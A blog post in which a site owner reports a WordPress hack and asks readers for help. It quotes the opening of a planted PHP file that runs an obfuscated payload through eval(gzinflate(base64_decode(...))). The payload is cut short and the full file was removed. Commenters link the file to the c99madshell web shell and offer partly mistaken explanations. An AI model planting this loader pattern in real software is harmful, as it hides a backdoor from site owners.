My Blog Hacked for Spam

Fucking spammers. Today I found a mountain of spam links for crap like zyrtec and zithromax in my footers.php.  All the links forward to  canadian-meds-shop.com. These are bad people:  scammers and thieves.

I also found a strange file in my wordpress theme file, 1.php. The file started like this:

<?PHP
              //Authentication
$login = “”; //Login
$pass = “”;  //Pass
$md5_pass = “”; //If no pass then hash
eval(gzinflate(base64_decode(‘HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//

I don’t know how this file got there or what it does but I’m pretty sure it’s bad stuff.

Do you want to try and figure out what this evil f’ing spam program does?  Here is the virus file. Caution! This is a bad program! (update: I removed the virus. It’s a bother that it keeps tripping my antivirus software.)

Tell me what you find out, would you?

Now I’ve got to figure out how they got on my system…. grrrrrr.

10 Comments

  1. (also see Nicholas’ followup comment below – Lee)
    Base64 is a method of encryption/decryption.

    The virus, is actually a script that includes a “binary” executable in the form of text, using base64 ecryption. The PHP code uses the eval method of calling the

    To evaluate what the program does, you must decrypt the code, saving into binary, then you must reverse engineer or run in a “safe thread” that can be evaluated for it’s purposes.

    The attack on your server was simple: use a web form provided on your site to feed garbage data until the server executes that data, saving a file into the web folder. Then, the attacker calls the program directly using the URL to the script… and if your server isn’t locked down just right, it will run.. injecting a binary into memory.. and they are in.

    Attackers tend to find security flaws in common free programs like blog scripts, then will find blogs on the web, then attact them.

  2. Most all blog hacks are from people not upgrading their blog software.

    If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.

    Hacker Forums

  3. lee says:

    Hey Hacker Forums, my blog and all the plugins are fully up to date. but good try. :-(

    Thanks for the comment and SEO. I’m not so keen on the self-promotion so I edited your links.

  4. kk says:

    try to print out the source with something like

    <? echo gzinflate(base64_decode(‘HJ3…

  5. patrick says:

    Hey Lee,

    Thanks for posting this. I found it by searching the first several characters of the base_64/gz hash. Same thing happened to me, just different file names. Nothing harmed other than the file placement. I have a joomla site.

    I am wondering if you found out how the file was placed.

    I only have http/error logs to go by, and I cannot determine the MO from it.

    I have IP of the my offender, if you wish to compare notes, but I am most interested in the How than the Who right now.

    Thanks!

  6. lee says:

    Patrick, I haven’t figured out how this file got there. All I’ve really done so far is changed my WordPress password and haven’t gotten another attack. I wish I had a better answer. :-(

  7. 6 months later says:

    search c99madshell for more info

  8. lee says:

    >c99madshell

    Cool. Thanks for the pointer.

  9. I have made a mistake in the following previous post:

    Base64 is a method of encryption/decryption.

    The virus, is actually a script that includes a “binary” executable in the form of text, using base64 ecryption. The PHP code uses the eval method of calling the

    To evaluate what the program does, you must decrypt the code, saving into binary, then you must reverse engineer or run in a “safe thread” that can be evaluated for it’s purposes.

    The attack on your server was simple: use a web form provided on your site to feed garbage data until the server executes that data, saving a file into the web folder. Then, the attacker calls the program directly using the URL to the script… and if your server isn’t locked down just right, it will run.. injecting a binary into memory.. and they are in.

    Attackers tend to find security flaws in common free programs like blog scripts, then will find blogs on the web, then attact them.

    —————–
    The mistake is that base64 was an encryption/decryption protocol… it is not. It is actually a method of encoding and decoding data, both text and binary so that it can be easily transfered between services such as client/server… and for things like storing images and other files in a SQL database… the possibilities are sort of endless… Sometimes i write without reviewing my statements, thus why i didn’t catch the encryption/decryption vs encoding/decoding.

  10. lee says:

    Hey Nicholas. Thanks for the update. I put a little note on your first comment above.

Leave a Comment

Do not write "http://" or "https://" in your comment, it will be blocked. It may take a few days for me to manually approve your first comment.